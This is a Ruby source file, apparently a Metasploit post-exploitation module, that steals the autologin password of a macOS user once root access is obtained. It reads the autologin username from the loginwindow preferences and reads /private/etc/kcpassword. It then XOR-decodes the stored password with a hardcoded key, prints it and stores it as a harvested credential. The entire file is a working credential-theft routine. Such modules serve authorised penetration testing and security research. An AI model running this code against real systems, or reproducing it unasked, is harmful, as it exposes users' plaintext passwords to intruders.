1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::OSX::Priv
9

10
  # extract/verify by XORing your kcpassword with your password
11
  AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F]
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'OSX Gather Autologin Password as Root',
18
        'Description' => %q{
19
          This module will steal the plaintext password of any user on the machine
20
          with autologin enabled. Root access is required.
21

22
          When a user has autologin enabled (System Preferences -> Accounts), OSX
23
          stores their password with an XOR encoding in /private/etc/kcpassword.
24
        },
25
        'License' => MSF_LICENSE,
26
        'Author' => [ 'joev' ],
27
        'Platform' => [ 'osx' ],
28
        'References' => [
29
          ['URL', 'https://web.archive.org/web/20180408062145/http://www.brock-family.org/gavin/perl/kcpassword.html'],
30
        ],
31
        'SessionTypes' => [ 'meterpreter', 'shell' ],
32
        'Notes' => {
33
          'Stability' => [CRASH_SAFE],
34
          'SideEffects' => [],
35
          'Reliability' => []
36
        }
37
      )
38
    )
39

40
    register_advanced_options([
41
      OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword'])
42
    ])
43
  end
44

45
  def run
46
    # ensure the user is root (or can read the kcpassword)
47
    unless is_root?
48
      fail_with(Failure::NoAccess, 'Root privileges are required to read kcpassword file')
49
    end
50

51
    # read the autologin account from prefs plist
52
    read_cmd = 'defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username'
53
    autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'")
54

55
    if autouser.present?
56
      print_status "User #{autouser} has autologin enabled, decoding password..."
57
    else
58
      fail_with(Failure::NotVulnerable, 'No users on this machine have autologin enabled')
59
    end
60

61
    # kcpass contains the XOR'd bytes
62
    kcpass = read_file(kcpassword_path)
63
    key = AUTOLOGIN_XOR_KEY
64

65
    # decoding routine, slices into 11 byte chunks and XOR's each chunk
66
    decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc|
67
      kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join
68
    end.join.sub(/\x00.*$/, '')
69

70
    # save in the database
71
    # Don't record a Login, since we don't know what service to tie it to
72
    credential_data = {
73
      workspace_id: myworkspace_id,
74
      origin_type: :session,
75
      session_id: session_db_id,
76
      post_reference_name: refname,
77
      username: autouser,
78
      private_data: decoded,
79
      private_type: :password
80
    }
81

82
    create_credential(credential_data)
83
    print_good "Decoded autologin password: #{autouser}:#{decoded}"
84
  end
85

86
  private
87

88
  def kcpassword_path
89
    datastore['KCPASSWORD_PATH']
90
  end
91

92
  def user
93
    @user ||= cmd_exec('whoami').chomp
94
  end
95
end
96

97